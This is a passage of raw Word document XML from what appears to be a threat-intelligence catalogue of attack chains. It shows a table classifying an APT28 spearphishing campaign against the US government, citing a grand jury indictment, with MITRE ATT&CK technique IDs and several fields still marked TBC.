      <w:r w:rsidRPr="00445E1A">
        <w:t xml:space="preserve"> web shell to maintain persistent access on a target's Outlook Web Access (OWA®) server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D92657E" w14:textId="431CA4F0" w:rsidR="00445E1A" w:rsidRDefault="00445E1A" w:rsidP="00445E1A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00445E1A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1505.003 Server Software Component: Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF065DA" w14:textId="6D802DCA" w:rsidR="00155B94" w:rsidRDefault="00155B94" w:rsidP="00445E1A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6969972A" w14:textId="15F955D6" w:rsidR="00155B94" w:rsidRDefault="00155B94" w:rsidP="00445E1A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665377E1" w14:textId="195EB7D4" w:rsidR="00B75239" w:rsidRDefault="00B75239" w:rsidP="00445E1A"/>
    <w:p w14:paraId="125601FB" w14:textId="0896AA84" w:rsidR="00B75239" w:rsidRDefault="00B75239" w:rsidP="00445E1A"/>
    <w:p w14:paraId="17184380" w14:textId="61BF059F" w:rsidR="00B75239" w:rsidRPr="00B75239" w:rsidRDefault="00B75239" w:rsidP="00445E1A"/>
    <w:p w14:paraId="1E174A39" w14:textId="77777777" w:rsidR="004E216B" w:rsidRDefault="004E216B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B35B78C" w14:textId="3D7A7640" w:rsidR="00FB171C" w:rsidRDefault="002E0F74" w:rsidP="00F308BD">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc153480849"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T1566.002</w:t>
      </w:r>
      <w:r w:rsidR="00FB171C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F308BD">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00FB171C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F308BD">
        <w:t>INDICTMENT - The Grand Jury for the District of Columbia charges</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidR="00F308BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CF2FDB" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="00FB171C">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FB171C" w:rsidRPr="002D1D50" w14:paraId="4F7FD903" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="756BAEA9" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F187BE3" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29557BEC" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00387DCC" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="31AC6BEC" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76B51E7B" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D5F3F16" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A03DFC5" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00387DCC" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="14735578" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EB51107" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="007328DE" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="435B20A5" w14:textId="0C06B51D" w:rsidR="00FB171C" w:rsidRPr="007328DE" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T1566.00</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="007328DE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A003163" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00387DCC" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="02BA6829" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27A2A068" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24F07805" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="007328DE" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3839212C" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00387DCC" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="1E87466B" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="443A91D6" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15F98747" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20C772AE" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00387DCC" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="617DD764" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46A53C1B" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BFFAB5A" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Government</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A5D89D7" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00387DCC" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="089134A3" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33BD12D0" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77877639" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22CF5F8C" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="131C3426" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="459CFC39" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3284FA96" w14:textId="705B9D8F" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="328E2B34" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="13D8DA9E" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C094981" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B55C071" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33C47C14" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947A0B" w:rsidRPr="00B857D7" w14:paraId="1F0592D5" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D47EC6A" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B4573B4" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12749F07"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7D3CCBA3" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33DEAD34" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00A763BC" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30A9CD7C" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="317F7A96" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0147A097" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33E87562" w14:textId="67BD9DCD" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77EBF0BD" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="41BAA928" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="028E885D" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31121048" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D07725A" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30F841CB" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00AC7A85" w:rsidRDefault="00FB171C" w:rsidP="00FB171C"/>
    <w:p w14:paraId="3F00CF8E" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="00FB171C">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408"/>
        <w:gridCol w:w="661"/>
        <w:gridCol w:w="699"/>
        <w:gridCol w:w="557"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2126"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="002D1D50" w14:paraId="76F32729" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1D274704" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="06DC226C" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="46214507" w14:textId="1051850E" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT28_00</w:t>
            </w:r>
            <w:r w:rsidR="002E0F74">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0561F570" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
